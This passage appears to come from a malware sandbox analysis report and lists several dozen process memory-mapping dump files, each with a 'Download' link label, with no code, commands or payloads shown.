                                                      • memory/2484-151-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/2608-195-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/2728-138-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/2732-169-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/2796-157-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/2828-163-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/2952-140-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/2980-192-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/2996-187-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/3040-188-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/3396-153-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/3528-196-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/3612-130-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/3632-160-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/3648-175-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/3756-180-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/3836-165-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/3868-154-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4028-170-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4064-166-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4080-146-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4148-186-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4272-167-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4288-139-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4344-191-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4348-164-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4360-190-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4376-162-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4408-141-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4412-189-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4476-149-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4608-148-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4772-142-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4832-137-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/4984-168-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/5028-156-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/5056-155-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/5060-159-0x0000000000000000-mapping.dmp
                                                        Download